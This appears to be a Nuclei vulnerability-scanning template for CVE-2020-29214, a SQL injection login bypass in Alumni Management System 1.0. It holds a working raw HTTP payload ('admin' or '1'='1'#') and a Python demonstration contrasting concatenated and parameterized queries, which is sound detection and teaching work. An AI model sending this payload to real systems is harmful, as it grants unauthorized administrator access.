Vulnerability Description
SourceCodester Alumni Management System 1.0 contains a SQL injection vulnerability caused by unsanitized input in admin/login.php, which lets attackers bypass authentication. Exploitation requires injecting a malicious SQL payload.
id: CVE-2020-29214

info:
  name: Alumni Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    SourceCodester Alumni Management System 1.0 contains a sql_injection caused by unsanitized input in admin/login.php, letting attackers bypass authentication, exploit requires injection of malicious SQL payload.
  reference:
    - https://www.exploit-db.com/exploits/48883
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29214
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29214
    cwe-id: CWE-89
    epss-score: 0.47269
    epss-percentile: 0.97545
    cpe: cpe:2.3:a:alumni_management_system_project:alumni_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: alumni_management_system_project
    product: alumni_management_system
  tags: cve,cve2020,sqli,auth-bypass,cms,edb,alumni,vuln

http:
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
      - |
        GET /admin/index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Welcome back Admin!'
          - 'Alumni List'
        condition: and

      - type: word
        part: body
        words:
          - '#login-form'
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e9eac3d243af5c0162d581bd893a95cd8d0f8e6e1039d2ada30a8943b6550491022100f772ac3d4cf3c1c8bfab6203b34d8a17cf1d59b1e9f0bb635877ef772c167baa:922c64590222798bb761d5b6d8e72950
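
The following is an added example, not code from the application or from the template. It decodes the form body of the template's first request and shows why a login query built by string concatenation accepts it, while a parameterized query rejects it. Assumptions: the `users` schema, the function names, the PBKDF2 hash and the sample password are constructed, `sqlite3` stands in for the application's MySQL database, and MySQL's `#` comment is emulated by truncating the query at the `#`.

```python
import hashlib
import hmac
import sqlite3
from urllib.parse import parse_qs

# Constructed sample: body of the template's first request, with a
# fixed string in place of {{rand_base(5)}}.
BODY = "username=admin'+or+'1'%3D'1'%23&password=AAAAA"

def hash_pw(password):
    # Constructed fixed salt keeps the example short; use per-user salts in practice.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"constructed-salt", 100_000).hex()

def make_db():
    # Assumed schema, not the application's real one.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (hash_pw("correct horse"),))
    return db

def concat_sql(username, password):
    # Vulnerable shape: request values are pasted into the SQL text.
    return ("SELECT id FROM users WHERE username = '" + username +
            "' AND pw_hash = '" + hash_pw(password) + "'")

def as_mysql_parses(sql):
    # MySQL treats '#' as a comment to end of line; naive emulation for this sample.
    return sql.split("#", 1)[0]

def login_concat(db, username, password):
    sql = as_mysql_parses(concat_sql(username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, username, password):
    # Hardened: the username is bound as data and the hash is compared in code.
    row = db.execute("SELECT id, pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row and hmac.compare_digest(row[1], hash_pw(password)):
        return row[0]
    return None

def demo():
    form = {k: v[0] for k, v in parse_qs(BODY).items()}
    db = make_db()
    return {
        "concat_injected": login_concat(db, form["username"], form["password"]),
        "param_injected": login_param(db, form["username"], form["password"]),
        "param_valid": login_param(db, "admin", "correct horse"),
        "param_wrong_pw": login_param(db, "admin", "AAAAA"),
    }
```

With concatenation, the password condition is commented out and `'1'='1'` makes the `WHERE` clause true for the first user row; with a bound parameter, the same string is only a username that matches no row.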